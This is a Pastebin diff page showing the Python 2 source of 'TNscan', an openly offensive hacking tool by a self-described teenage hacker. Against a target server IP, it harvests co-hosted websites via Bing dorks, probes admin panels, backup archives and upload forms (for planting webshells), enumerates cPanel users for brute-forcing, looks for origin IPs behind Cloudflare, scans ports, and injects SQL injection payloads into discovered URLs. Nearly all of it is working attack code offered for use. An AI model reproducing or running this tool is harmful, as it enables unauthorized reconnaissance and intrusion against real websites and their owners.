View difference between Paste ID: <a href="/6gBTiwY7">6gBTiwY7</a> and <a href="/syeXkbRn">syeXkbRn</a>

#!/usr/bin/env python2
1		#!/usr/bin/env python2
2		# >>> Bism Allah <<<
3		# Code Name : TNscan v1.0
4		# Coder : MatriX Coder (17 yo guy from Tunisia)
5		# Blog : www.matrixcoder.co.vu
6		# Twitter : MatriX_Coder
7		# Pastebin : www.pastebin.com/u/matrixcoder
8		# this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
9		# Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
10		# greats also to tunisia fallega team and to madleets team and to you !
11		# Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
12
13		import re, urllib2, urllib, os, socket, sys
14		from platform import system
15		logo = """
16		\t _____ _ _
17		\t\|_ _\| \ \| \|
18		\t \| \| \| \\| \|___ ___ __ _ _ __
19		\t \| \| \| . ` / __\|/ __/ _` \| '_ \
20		\t \| \| \| \|\ \__ \ (_\| (_\| \| \| \| \|
21		\t \_/ \_\| \_/___/\___\__,_\|_\| \|_\| v1.0
22
23		"""
24
25		menu = """
26		1) Get all websites
27		2) Get joomla websites
28		3) Get wordpress websites
29		4) Find control panel
30		5) Find zip files
31		6) Find upload files
32		7) Get server users
33		8) Scan from SQL injection
34		9) Crawl and scan from SQL injection (soon)
35		10) Scan ports (range of ports)
36		11) Scan ports (common ports )
37		12) Get server banner
38		13) Bypass Cloudflare
39		14) About !
40		99) Exit
41		"""
42		def unique(seq):
43		"""
44		get unique from list found it on stackoverflow
45		"""
46		seen = set()
47		return [seen.add(x) or x for x in seq if x not in seen]
48
49		def clearScr() :
50		"""
51		clear the screen in case of GNU/Linux or
52		windows
53		"""
54		if system() == 'Linux':
55		os.system('clear')
56		if system() == 'Windows':
57		os.system('cls')
58
59		class TNscan :
60		def __init__(self, serverip) :
61		self.serverip = serverip
62		self.getSites(False)
63		print menu
64		while True :
65		choice = raw_input(' Enter choice -> ')
66		if choice == '1' :
67		self.getSites(True)
68		elif choice == '2' :
69		self.getJoomla()
70		elif choice == '3' :
71		self.getWordpress()
72		elif choice == '4' :
73		self.findPanels()
74		elif choice == '5' :
75		self.findZip()
76		elif choice == '6' :
77		self.findUp()
78		elif choice == '7' :
79		self.getUsers()
80		elif choice == '8' :
81		self.grabSqli()
82		elif choice == '10' :
83		ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
84		self.portScanner(1, ran)
85		elif choice == '11' :
86		self.portScanner(2, None)
87		elif choice == '12' :
88		self.getServerBanner()
89		elif choice == '13' :
90		self.cloudflareBypasser()
91		elif choice == '14' :
92		self.aboutME()
93		elif choice == '99' :
94		print ' Goodbye'
95		exit()
96		con = raw_input(' Continue [Y/n] -> ')
97		if con[0].upper() == 'N' :
98		exit()
99		else :
100		clearScr()
101		print logo
102		print menu
103
104		def aboutME(self) :
105		clearScr()
106		print """
107		>>> Bism Allah <<<
108		Code Name : TNscan v1.0
109		Coder : MatriX Coder (17 yo guy from Tunisia)
110		Blog : www.matrixcoder.co.vu
111		Twitter : MatriX_Coder
112		Pastebin : www.pastebin.com/u/matrixcoder
113		this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
114		Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
115		greats also to tunisian fallega team, to madleets team and to you !
116		Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
117		"""
118
119		def getSites(self, a) :
120		"""
121		get all websites on same server
122		from bing search
123		"""
124		lista = []
125		page = 1
126		while page <= 101:
127		try:
128		bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
129		openbing = urllib2.urlopen(bing)
130		readbing = openbing.read()
131		findwebs = re.findall('<h2><a href="(.*?)"', readbing)
132		for i in range(len(findwebs)):
133		allnoclean = findwebs[i]
134		findall1 = re.findall('http://(.*?)/', allnoclean)
135		for idx, item in enumerate(findall1):
136		if 'www' not in item:
137		findall1[idx] = 'http://www.' + item + '/'
138		else:
139		findall1[idx] = 'http://' + item + '/'
140		lista.extend(findall1)
141
142		page += 50
143		except urllib2.URLError:
144		pass
145		self.sites = unique(lista)
146		if a :
147		clearScr()
148		print '[*] Found ', len(lista), ' Website\n'
149		for site in self.sites :
150		print site
151
152		def getWordpress(self) :
153		"""
154		get wordpress site using a dork the attacker
155		may do a password list attack (i did a tool for that purpose check my pastebin)
156		or scan for common vulnerabilities using wpscan for example (i did a simple tool
157		for multi scanning using wpscan)
158		"""
159		lista = []
160		page = 1
161		while page <= 101:
162		try:
163		bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
164		openbing = urllib2.urlopen(bing)
165		readbing = openbing.read()
166		findwebs = re.findall('<h2><a href="(.*?)"', readbing)
167		for i in range(len(findwebs)):
168		wpnoclean = findwebs[i]
169		findwp = re.findall('(.*?)\?page_id=', wpnoclean)
170		lista.extend(findwp)
171		page += 50
172		except:
173		pass
174		lista = unique(lista)
175		clearScr()
176		print '[*] Found ', len(lista), ' Wordpress Website\n'
177		for site in lista :
178		print site
179
180		def getJoomla(self) :
181		"""
182		get all joomla websites using
183		bing search the attacker may bruteforce
184		or scan them
185		"""
186		lista = []
187		page = 1
188		while page <= 101:
189		bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
190		openbing = urllib2.urlopen(bing)
191		readbing = openbing.read()
192		findwebs = re.findall('<h2><a href="(.*?)"', readbing)
193		for i in range(len(findwebs)):
194		jmnoclean = findwebs[i]
195		findjm = re.findall('(.*?)index.php', jmnoclean)
196		lista.extend(findjm)
197		page += 50
198		lista = unique(lista)
199		clearScr()
200		print '[*] Found ', len(lista), ' Joomla Website\n'
201		for site in lista :
202		print site
203
204
205		def findPanels(self) :
206		"""
207		find panels from grabbed websites
208		the attacker may do a lot of vulnerabilty
209		tests on the admin area
210		"""
211		adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
212		clearScr()
213		for site in self.sites :
214		for admin in adminList :
215		if urllib.urlopen(site + admin).getcode() == 200 :
216		print " [*] Found admin panel -> ", site + admin
217
218		def findZip(self) :
219		"""
220		find zip files from grabbed websites
221		it may contain useful informations
222		"""
223		zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
224		clearScr()
225		for site in self.sites :
226		for zip1 in zipList :
227		if urllib.urlopen(site + zip1).getcode() == 200 :
228		print " [*] Found zip file -> ", site + zip1
229
230		def findUp(self) :
231		"""
232		find upload forms from grabbed
233		websites the attacker may succeed to
234		upload malicious files like webshells
235		"""
236		upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
237		clearScr()
238		for site in self.sites :
239		for up in upList :
240		if (urllib.urlopen(site + up).getcode() == 200) :
241		html = urllib.urlopen(site + up).readlines()
242		for line in html :
243		if re.findall('type=file', line) :
244		print " [*] Found upload -> ", site+up
245
246		def getUsers(self) :
247		"""
248		get server users using a method found by
249		iranian hackers i think, the attacker may
250		do a bruteforce attack on CPanel, ssh, ftp or
251		even mysql if it supports remote login
252		(you can use medusa or hydra)
253		"""
254		userslist = []
255		for site in self.sites :
256		try:
257		site = site.replace('http://www.', '')
258		site = site.replace('http://', '')
259		site = site.replace('.', '')
260		if '-' in site:
261		site = site.replace('-', '')
262		site = site.replace('/', '')
263
264		while len(site) > 2:
265		resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
266		if 'invalid username' not in resp.lower():
267		print '\t [*] Found -> ', site
268		userslist.append(site)
269		else :
270		print site
271
272		site = site[:-1]
273
274		clearScr()
275		for user in userlist :
276		print user
277
278		except:
279		pass
280
281		def cloudflareBypasser(self) :
282		"""
283		trys to bypass cloudflare i already wrote
284		in my blog how it works, i learned this
285		method from a guy in madleets
286		"""
287		clearScr()
288		subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
289		for site in self.sites :
290		site.replace('http://', '')
291		site.replace('/', '')
292		try:
293		ip = socket.gethostbyname(site)
294		except socket.error:
295		pass
296		for sub in subdoms:
297		doo = sub + '.' + site
298		print ' [~] Trying -> ', doo
299		try:
300		ddd = socket.gethostbyname(doo)
301		if ddd != ip:
302		print ' [*] Cloudflare bypassed -> ', ddd
303		break
304		except socket.error :
305		pass
306
307		def getServerBanner(self) :
308		"""
309		simply gets the server banner
310		the attacker may benefit from it
311		like getting the server side software
312		"""
313		clearScr()
314		try:
315		s = 'http://' + self.serverip
316		httpresponse = urllib.urlopen(s)
317		print ' [*] Server header -> ', httpresponse.headers.getheader('server')
318		except:
319		pass
320
321		def grabSqli(self) :
322		"""
323		just grabs all websites in server with php?id= dork
324		for scanning for error based sql injection
325		"""
326		page = 1
327		lista = []
328		while page <= 101:
329		try:
330		bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
331		openbing = urllib2.urlopen(bing)
332		readbing = openbing.read()
333		findwebs = re.findall('<h2><a href="(.*?)"', readbing)
334		for i in range(len(findwebs)):
335		x = findwebs[i]
336		lista.append(x)
337		except:
338		pass
339		page += 50
340		lista = unique(lista)
341		self.checkSqli(lista)
342
343		def checkSqli(self, s):
344		"""
345		checks for error based sql injection,
346		most of the codes here are from webpwn3r
347		project the one who has found an lfi in
348		yahoo as i remember, you can find a separate
349		tool in my blog
350		"""
351		clearScr()
352		payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
353		check = re.compile("Incorrect syntax\|mysql_fetch\|Syntax error\|Unclosed.+mark\|unterminated.+qoute\|SQL.+Server\|Microsoft.+Database\|Fatal.+error", re.I)
354		for url in s:
355		try:
356		for param in url.split('?')[1].split('&'):
357		for payload in payloads:
358		power = url.replace(param, param + payload.strip())
359		#print power
360		html = urllib2.urlopen(power).readlines()
361		for line in html:
362		checker = re.findall(check, line)
363		if len(checker) != 0 :
364		print ' [*] SQLi found -> ', power
365		except:
366		pass
367
368		def crawlSqli(self) :
369		"""
370		simple crawling using chilkat (yeah chilkat sucks)
371		and scan for error based sql injection
372		[!] will be on the next version
373		"""
374		pass
375
376		def portScanner(self, mode, ran) :
377		"""
378		simple port scanner works with range of ports
379		or with common ports (al-swisre idea)
380		"""
381		clearScr()
382		def do_it(ip, port):
383		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
384		#sock.settimeout(5)
385		sock = sock.connect_ex((ip,port))
386		if sock == 0:
387		print " [*] Port %i is open" % port
388
389		if mode == 1 :
390		a = ran.split('-')
391		start = int(a[0])
392		end = int(a[1])
393		for i in range(start, end):
394		do_it(self.serverip, i)
395		elif mode == 2 :
396		for port in [80,21,22,2082,25,53,110,443,143] :
397		# didn't use multithreading cos it's few ports
398		do_it(self.serverip, port)
399
400		if __name__ == '__main__' :
401		try :
402		clearScr()
403		print logo
404		TNscan(sys.argv[1])
405		except IndexError :
406		print " [*] Usage : python "+sys.argv[0]+" 127.0.0.1"